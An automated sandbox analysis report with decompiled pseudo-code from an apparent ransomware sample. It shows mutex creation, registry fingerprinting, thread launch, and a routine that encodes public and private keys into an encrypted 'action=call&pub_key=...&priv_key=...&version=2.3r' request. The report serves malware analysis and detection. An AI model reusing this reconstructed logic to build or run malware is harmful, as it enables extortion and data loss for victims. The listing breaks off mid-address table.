                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D465C
                                        • lstrcpyW.KERNEL32 ref: 0F9D467F
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4686
                                        • CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D469E
                                        • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46AA
                                        • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46B1
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
                                        • String ID: Global\
                                        • API String ID: 3131499543-188423391
                                        • Opcode ID: 91c9ba5e8016759d1d33f44c45847dda1f1c19209f221feeb9f128592384ed4e
                                        • Instruction ID: 7d452d390671e7f075607f68ebe5ffd14b81f1648f188002da5812e2c0d33988
                                        • Opcode Fuzzy Hash: 91c9ba5e8016759d1d33f44c45847dda1f1c19209f221feeb9f128592384ed4e
                                        • Instruction Fuzzy Hash: B12138316543117BF234A768DC4AF7F765CDB80B55FB00628F606660C2EAE87D14C6EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D7C10 Relevance: 12.6, APIs: 10, Instructions: 67COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 193 f9d7c10-f9d7c1d 194 f9d7c1f-f9d7c29 VirtualFree 193->194 195 f9d7c2b-f9d7c2f 193->195 194->195 196 f9d7c3d-f9d7c41 195->196 197 f9d7c31-f9d7c3b VirtualFree 195->197 198 f9d7c4f-f9d7c53 196->198 199 f9d7c43-f9d7c4d VirtualFree 196->199 197->196 200 f9d7c55-f9d7c5f VirtualFree 198->200 201 f9d7c61-f9d7c65 198->201 199->198 200->201 202 f9d7c67-f9d7c71 VirtualFree 201->202 203 f9d7c73-f9d7c77 201->203 202->203 204 f9d7c79-f9d7c83 VirtualFree 203->204 205 f9d7c85-f9d7c89 203->205 204->205 206 f9d7c8b-f9d7c95 VirtualFree 205->206 207 f9d7c97-f9d7c9b 205->207 206->207 208 f9d7c9d-f9d7ca7 VirtualFree 207->208 209 f9d7ca9-f9d7cad 207->209 208->209 210 f9d7caf-f9d7cb9 VirtualFree 209->210 211 f9d7cbb-f9d7cc2 209->211 210->211 212 f9d7cc4-f9d7cd1 VirtualFree 211->212 213 f9d7cd3-f9d7cd5 211->213 212->213
                                        C-Code - Quality: 100%
                                        			E0F9D7C10(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}





                                        0x0f9d7c11
                                        0x0f9d7c1d
                                        0x0f9d7c29
                                        0x0f9d7c29
                                        0x0f9d7c2f
                                        0x0f9d7c3b
                                        0x0f9d7c3b
                                        0x0f9d7c41
                                        0x0f9d7c4d
                                        0x0f9d7c4d
                                        0x0f9d7c53
                                        0x0f9d7c5f
                                        0x0f9d7c5f
                                        0x0f9d7c65
                                        0x0f9d7c71
                                        0x0f9d7c71
                                        0x0f9d7c77
                                        0x0f9d7c83
                                        0x0f9d7c83
                                        0x0f9d7c89
                                        0x0f9d7c95
                                        0x0f9d7c95
                                        0x0f9d7c9b
                                        0x0f9d7ca7
                                        0x0f9d7ca7
                                        0x0f9d7cad
                                        0x0f9d7cb9
                                        0x0f9d7cb9
                                        0x0f9d7cc2
                                        0x00000000
                                        0x0f9d7cd1
                                        0x0f9d7cd5

                                        APIs
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C29
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C3B
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C4D
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C5F
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C71
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C83
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C95
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7CA7
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7CB9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7CD1
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 79308fede0dd34f7c785c521a96fb6aa572d869fe66738e1eea17ab525b50520
                                        • Instruction ID: 2dde35d49bffbb49bbc6d1cf7c7ad688f88bf9823c385c9e0f5936e06ac3d16e
                                        • Opcode Fuzzy Hash: 79308fede0dd34f7c785c521a96fb6aa572d869fe66738e1eea17ab525b50520
                                        • Instruction Fuzzy Hash: A0211F30240B04AEE7762A25DD0AFA6B2E5BB40B45F758828F2C1245F18BF57499DF08
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D72B0 Relevance: 7.5, APIs: 5, Instructions: 47registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D72B0(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}






                                        0x0f9d72c6
                                        0x0f9d72d0
                                        0x0f9d7324
                                        0x0f9d72d2
                                        0x0f9d72d5
                                        0x0f9d72e7
                                        0x0f9d72ef
                                        0x0f9d7306
                                        0x0f9d730f
                                        0x0f9d731b
                                        0x0f9d72f1
                                        0x0f9d72f4
                                        0x0f9d72f7
                                        0x0f9d7303
                                        0x0f9d7303
                                        0x0f9d72ef

                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,0000060C,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D72C6
                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000080,?,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D72E7
                                        • RegCloseKey.KERNELBASE(?,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D72F7
                                        • GetLastError.KERNEL32(?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D7306
                                        • RegCloseKey.ADVAPI32(?,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D730F
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$ErrorLastOpenQueryValue
                                        • String ID:
                                        • API String ID: 2437438455-0
                                        • Opcode ID: af505a80bcd8e54166c52c55d3e20a9edc2653fe9ba8d75e764162b63f563ba6
                                        • Instruction ID: 94ab027d20f8a07a38f8fb476f74b7d571647572b9bf46a2f79076786ac883c3
                                        • Opcode Fuzzy Hash: af505a80bcd8e54166c52c55d3e20a9edc2653fe9ba8d75e764162b63f563ba6
                                        • Instruction Fuzzy Hash: BE011A3260511DEBDB119F94ED09D9ABB6CEB09362B108166FD05D6111D7329A34AFE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D4BF0 Relevance: 3.0, APIs: 2, Instructions: 25threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 219 f9d4bf0-f9d4c29 CreateThread 221 f9d4c2b-f9d4c2f FindCloseChangeNotification 219->221 222 f9d4c35-f9d4c3b 219->222 221->222
                                        C-Code - Quality: 100%
                                        			_entry_(intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t10;

				_v16 = 1;
				_v12 = _a8;
				_t10 = CreateThread(0, 0, E0F9D4950, 0, 0, 0); // executed
				_v8 = _t10;
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				return _v16;
			}







                                        0x0f9d4bf6
                                        0x0f9d4c00
                                        0x0f9d4c1c
                                        0x0f9d4c22
                                        0x0f9d4c29
                                        0x0f9d4c2f
                                        0x0f9d4c2f
                                        0x0f9d4c3b

                                        APIs
                                        • CreateThread.KERNELBASE ref: 0F9D4C1C
                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0F9D4C2F
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ChangeCloseCreateFindNotificationThread
                                        • String ID:
                                        • API String ID: 4060959955-0
                                        • Opcode ID: 48cb12911a711d1e0ae6269b98b08b4a26e368db564743880a3633a6e7b456da
                                        • Instruction ID: 70925dfa41bdb85fd63494aa49d68d5455b6cc1a7395b84163fd23db5c34ad49
                                        • Opcode Fuzzy Hash: 48cb12911a711d1e0ae6269b98b08b4a26e368db564743880a3633a6e7b456da
                                        • Instruction Fuzzy Hash: 16F03934A48308FBE720DFA4D90AB8CB774EB04705F30809AFA016B2C1D6B56690CB48
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 0F9D5880 Relevance: 87.9, APIs: 45, Strings: 5, Instructions: 416stringmemoryencryptionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 228 f9d5880-f9d590c call f9d39f0 call f9d7330 call f9d7140 VirtualAlloc 235 f9d590e-f9d5910 228->235 236 f9d5921-f9d5925 228->236 235->236 237 f9d5912-f9d591f 235->237 238 f9d5927-f9d5936 236->238 237->238 239 f9d594f-f9d5951 238->239 240 f9d5938-f9d593d 238->240 242 f9d5955-f9d595e 239->242 240->239 241 f9d593f-f9d594d 240->241 241->242 243 f9d596d-f9d596f 242->243 244 f9d5960-f9d596b 242->244 245 f9d5973-f9d5975 243->245 244->243 244->245 246 f9d597b-f9d59f8 CryptBinaryToStringA * 2 lstrlenA * 2 VirtualAlloc lstrlenA 245->246 247 f9d5d44 245->247 248 f9d5a0f 246->248 249 f9d59fa-f9d59fc 246->249 250 f9d5d4a 247->250 252 f9d5a17-f9d5a20 lstrlenA 248->252 249->248 251 f9d59fe-f9d5a0d 249->251 253 f9d5d4f-f9d5d6d VirtualFree call f9d7c10 250->253 251->252 254 f9d5a2a 252->254 255 f9d5a22-f9d5a28 252->255 257 f9d5a32-f9d5a3c lstrlenA 254->257 255->254 255->257 259 f9d5a3e-f9d5a4a 257->259 260 f9d5a72-f9d5a79 lstrlenA 257->260 263 f9d5a50-f9d5a55 259->263 261 f9d5a7b-f9d5a7f 260->261 262 f9d5aa1-f9d5b68 lstrcatW lstrlenW call f9d6f40 lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW VirtualAlloc lstrlenW 260->262 264 f9d5a83-f9d5a88 261->264 274 f9d5b6a-f9d5b6c 262->274 275 f9d5b74-f9d5b76 262->275 266 f9d5a57-f9d5a59 263->266 267 f9d5a62-f9d5a6c lstrlenA 263->267 268 f9d5a8a-f9d5a8c 264->268 269 f9d5a95-f9d5a9f lstrlenA 264->269 266->267 271 f9d5a5b-f9d5a5e 266->271 267->263 272 f9d5a6e 267->272 268->269 273 f9d5a8e-f9d5a91 268->273 269->262 269->264 271->267 272->260 273->269 274->275 276 f9d5b6e-f9d5b72 274->276 277 f9d5b7a-f9d5c2e lstrlenW call f9d9010 lstrlenA call f9d5d70 call f9d5e20 CryptBinaryToStringA 275->277 276->277 284 f9d5c36-f9d5c5c lstrlenA VirtualAlloc lstrlenA 277->284 285 f9d5c30 GetLastError 277->285 286 f9d5c5e-f9d5c64 284->286 287 f9d5c66 284->287 285->284 286->287 288 f9d5c6e-f9d5c75 lstrlenA 286->288 287->288 289 f9d5c9e-f9d5cd4 lstrlenA MultiByteToWideChar call f9d54a0 288->289 290 f9d5c77-f9d5c7f 288->290 296 f9d5d07-f9d5d0d 289->296 297 f9d5cd6-f9d5d05 VirtualFree * 3 289->297 291 f9d5c80-f9d5c85 290->291 293 f9d5c87-f9d5c89 291->293 294 f9d5c92-f9d5c9c lstrlenA 291->294 293->294 298 f9d5c8b-f9d5c8e 293->298 294->289 294->291 299 f9d5d0f-f9d5d12 296->299 300 f9d5d14-f9d5d42 VirtualFree * 3 296->300 297->253 298->294 299->300 300->250
                                        C-Code - Quality: 78%
                                        			E0F9D5880(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v295;
				char _v296;
				char _v404;
				char _v408;
				void* _v428;
				CHAR* _v432;
				int _v436;
				int _v440;
				char _v442;
				CHAR* _v444;
				short _v448;
				int _v452;
				char _v456;
				CHAR* _v464;
				int _v468;
				void* _v472;
				BYTE* _v476;
				WCHAR* _v480;
				WCHAR* _v484;
				void* _v488;
				void* _v492;
				short* _v496;
				CHAR* _v500;
				void* _v504;
				long _v508;
				CHAR* _v512;
				CHAR* _v528;
				CHAR* _t133;
				void* _t135;
				int _t145;
				void* _t148;
				int _t149;
				void* _t150;
				void* _t152;
				signed int _t159;
				signed int _t163;
				void* _t170;
				signed int _t172;
				CHAR* _t185;
				long _t189;
				intOrPtr _t199;
				int _t200;
				void _t202;
				int _t203;
				void _t204;
				int _t205;
				long _t213;
				void* _t219;
				short _t228;
				char* _t229;
				WCHAR* _t231;
				short _t233;
				CHAR* _t234;
				char _t235;
				void* _t238;
				long _t240;
				long _t241;
				void* _t243;
				void* _t245;
				short _t248;
				int _t249;
				void* _t255;
				CHAR* _t256;
				WCHAR* _t258;
				WCHAR* _t259;
				signed int _t261;
				CHAR* _t262;
				CHAR* _t263;
				signed int _t266;
				int _t267;
				void* _t268;
				long _t271;
				void* _t272;
				void* _t273;
				long _t279;
				int _t280;
				long _t281;
				void* _t282;
				CHAR* _t283;
				short _t284;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v456 = __ecx;
				_v436 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(1);
				_push(__ecx);
				_push(1);
				E0F9D39F0( &_v404);
				E0F9D7330( &_v492, __edx);
				_t255 = E0F9D7140( &_v492);
				_t266 = _a8 + __edx;
				_t7 = _t266 + 8; // 0x8
				_t213 = _t255 + _t7 * 8 << 3;
				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40);
				_t248 = 0;
				_v512 = _t133;
				_v528 = _t133;
				_t228 = 0x30 + (_t255 + _t266 * 4) * 8;
				if(_t133 == 0 || _t228 >= _t213) {
					_v448 = _t248;
					_t256 = _t133;
				} else {
					_t256 =  &(_t133[_t228]);
					_v448 = _t133;
					_v444 = _t256;
					_t248 = _t228;
				}
				_t135 = 2 + _a8 * 8;
				if(_v428 == 0) {
					L7:
					_t229 = 0;
					_v432 = 0;
				} else {
					_t284 = _t248 + _t135;
					if(_t284 >= _t213) {
						goto L7;
					} else {
						_t229 = _t256;
						_v432 = _t256;
						_t256 =  &(_t256[_t135]);
						_t248 = _t284;
						_v444 = _t256;
					}
				}
				_t267 = _v440;
				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
					_t256 = 0;
					_v444 = 0;
				}
				if(_t229 == 0) {
					goto L53;
				} else {
					_t249 = _a8;
					_v436 = _t249 + _t249;
					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
					_v452 = _t267 + _t267;
					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
					_t145 = lstrlenA(_t256);
					_t271 = _t145 + lstrlenA(_v464) + 0x42;
					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40);
					_v472 = _t148;
					_v488 = _t148;
					_v492 = 0;
					_t149 = lstrlenA(_v464);
					_t231 = _v472;
					_t150 = _t149 + 1;
					if(_t231 == 0 || _t150 >= _t271) {
						_v484 = 0;
					} else {
						_v492 = _t150;
						_v488 = _t231 + _t150;
						_v484 = _t231;
					}
					_t152 = lstrlenA(_t256) + 1;
					if(_v472 == 0 || _t152 + _v492 >= _t271) {
						_v488 = 0;
					}
					_t272 = 0;
					if(lstrlenA(_v464) != 0) {
						_t245 = _v484;
						_t263 = _v464;
						_v492 = _t245;
						do {
							_t204 =  *((intOrPtr*)(_t272 + _t263));
							if(_t204 != 0xa && _t204 != 0xd) {
								 *_t245 = _t204;
								_v492 = _t245 + 1;
							}
							_t272 = _t272 + 1;
							_t205 = lstrlenA(_t263);
							_t245 = _v492;
						} while (_t272 < _t205);
						_t256 = _v476;
					}
					_t273 = 0;
					if(lstrlenA(_t256) != 0) {
						_t243 = _v488;
						_v492 = _t243;
						do {
							_t202 =  *((intOrPtr*)(_t273 + _t256));
							if(_t202 != 0xa && _t202 != 0xd) {
								 *_t243 = _t202;
								_v492 = _t243 + 1;
							}
							_t273 = _t273 + 1;
							_t203 = lstrlenA(_t256);
							_t243 = _v492;
						} while (_t273 < _t203);
					}
					_t258 = _v480;
					lstrcatW(_t258, L"action=call&");
					_t259 =  &(_t258[lstrlenW(_t258)]);
					E0F9D6F40( &_v440, _t259);
					lstrcatW(_t259, L"&pub_key=");
					_t159 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
					lstrcatW(_t259, L"&priv_key=");
					_t163 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
					lstrcatW(_t259, L"&version=2.3r");
					_t279 = (lstrlenW(_v484) << 4) + 0x12;
					_t219 = VirtualAlloc(0, _t279, 0x3000, 0x40);
					_v480 = _t219;
					_t170 = 2 + lstrlenW(_v484) * 8;
					if(_t219 == 0 || _t170 >= _t279) {
						_v492 = 0;
					} else {
						_v492 = _t219;
					}
					_t172 = lstrlenW(_v480);
					_t233 = "#shasj"; // 0x61687323
					_t261 = _t172;
					asm("movq xmm0, [0xf9dfc78]");
					_v448 = _t233;
					_t234 =  *0xf9dfc84; // 0x6a73
					_v444 = _t234;
					_t235 =  *0xf9dfc86; // 0x0
					asm("movq [esp+0x3c], xmm0");
					_v442 = _t235;
					_v296 = 0;
					E0F9D9010( &_v295, 0, 0xff);
					E0F9D5D70( &_v296,  &_v456, lstrlenA( &_v456));
					_t280 = _t261 + _t261;
					E0F9D5E20( &_v296, _v480, _t280);
					_t262 = _v492;
					_v468 = _t261 * 8;
					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
						GetLastError();
					}
					_t105 = lstrlenA(_t262) + 2; // 0x2
					_t281 = _t105;
					_v504 = VirtualAlloc(0, _t281, 0x3000, 0x40);
					_t107 = lstrlenA(_t262) + 1; // 0x1
					_t238 = _t107;
					_t185 = _v504;
					if(_t185 == 0) {
						L40:
						_v500 = 0;
					} else {
						_v500 = _t185;
						if(_t238 >= _t281) {
							goto L40;
						}
					}
					_t282 = 0;
					if(lstrlenA(_t262) != 0) {
						_t241 = _v500;
						_v508 = _t241;
						do {
							_t199 =  *((intOrPtr*)(_t282 + _t262));
							if(_t199 != 0xa && _t199 != 0xd) {
								 *_t241 = _t199;
								_v508 = _t241 + 1;
							}
							_t282 = _t282 + 1;
							_t200 = lstrlenA(_t262);
							_t241 = _v508;
						} while (_t282 < _t200);
					}
					_t283 = _v500;
					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
					_v508 = 0;
					_t189 = E0F9D54A0(_t283,  &_v508, 1);
					if(_t189 != 0) {
						_t240 = _v508;
						if(_t240 != 0) {
							 *_a12 = _t240;
						}
						VirtualFree(_v504, 0, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						L53:
						_t268 = 1;
					} else {
						VirtualFree(_v504, _t189, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						_t268 = 0;
					}
				}
				VirtualFree(_v428, 0, 0x8000);
				E0F9D7C10( &_v408);
				return _t268;
			}



















































































                                        0x0f9d588f
                                        0x0f9d5890
                                        0x0f9d5892
                                        0x0f9d5893
                                        0x0f9d5898
                                        0x0f9d589e
                                        0x0f9d58a2
                                        0x0f9d58a4
                                        0x0f9d58a5
                                        0x0f9d58a7
                                        0x0f9d58a8
                                        0x0f9d58aa
                                        0x0f9d58ab
                                        0x0f9d58ad
                                        0x0f9d58ae
                                        0x0f9d58b3
                                        0x0f9d58b5
                                        0x0f9d58b6
                                        0x0f9d58bf
                                        0x0f9d58c8
                                        0x0f9d58d9
                                        0x0f9d58db
                                        0x0f9d58e4
                                        0x0f9d58ea
                                        0x0f9d58f0
                                        0x0f9d58f6
                                        0x0f9d58f8
                                        0x0f9d58fc
                                        0x0f9d5903
                                        0x0f9d590c
                                        0x0f9d5921
                                        0x0f9d5925
                                        0x0f9d5912
                                        0x0f9d5912
                                        0x0f9d5915
                                        0x0f9d5919
                                        0x0f9d591d
                                        0x0f9d591d
                                        0x0f9d592f
                                        0x0f9d5936
                                        0x0f9d594f
                                        0x0f9d594f
                                        0x0f9d5951
                                        0x0f9d5938
                                        0x0f9d5938
                                        0x0f9d593d
                                        0x00000000
                                        0x0f9d593f
                                        0x0f9d593f
                                        0x0f9d5941
                                        0x0f9d5945
                                        0x0f9d5947
                                        0x0f9d5949
                                        0x0f9d5949
                                        0x0f9d593d
                                        0x0f9d595a
                                        0x0f9d595e
                                        0x0f9d596d
                                        0x0f9d596f
                                        0x0f9d596f
                                        0x0f9d5975
                                        0x00000000
                                        0x0f9d597b
                                        0x0f9d597b
                                        0x0f9d5987
                                        0x0f9d599a
                                        0x0f9d599f
                                        0x0f9d59b3
                                        0x0f9d59bc
                                        0x0f9d59d0
                                        0x0f9d59d5
                                        0x0f9d59df
                                        0x0f9d59e3
                                        0x0f9d59e7
                                        0x0f9d59ef
                                        0x0f9d59f1
                                        0x0f9d59f5
                                        0x0f9d59f8
                                        0x0f9d5a0f
                                        0x0f9d59fe
                                        0x0f9d5a01
                                        0x0f9d5a05
                                        0x0f9d5a09
                                        0x0f9d5a09
                                        0x0f9d5a1a
                                        0x0f9d5a20
                                        0x0f9d5a2a
                                        0x0f9d5a2a
                                        0x0f9d5a36
                                        0x0f9d5a3c
                                        0x0f9d5a3e
                                        0x0f9d5a42
                                        0x0f9d5a46
                                        0x0f9d5a50
                                        0x0f9d5a50
                                        0x0f9d5a55
                                        0x0f9d5a5b
                                        0x0f9d5a5e
                                        0x0f9d5a5e
                                        0x0f9d5a63
                                        0x0f9d5a64
                                        0x0f9d5a66
                                        0x0f9d5a6a
                                        0x0f9d5a6e
                                        0x0f9d5a6e
                                        0x0f9d5a73
                                        0x0f9d5a79
                                        0x0f9d5a7b
                                        0x0f9d5a7f
                                        0x0f9d5a83
                                        0x0f9d5a83
                                        0x0f9d5a88
                                        0x0f9d5a8e
                                        0x0f9d5a91
                                        0x0f9d5a91
                                        0x0f9d5a96
                                        0x0f9d5a97
                                        0x0f9d5a99
                                        0x0f9d5a9d
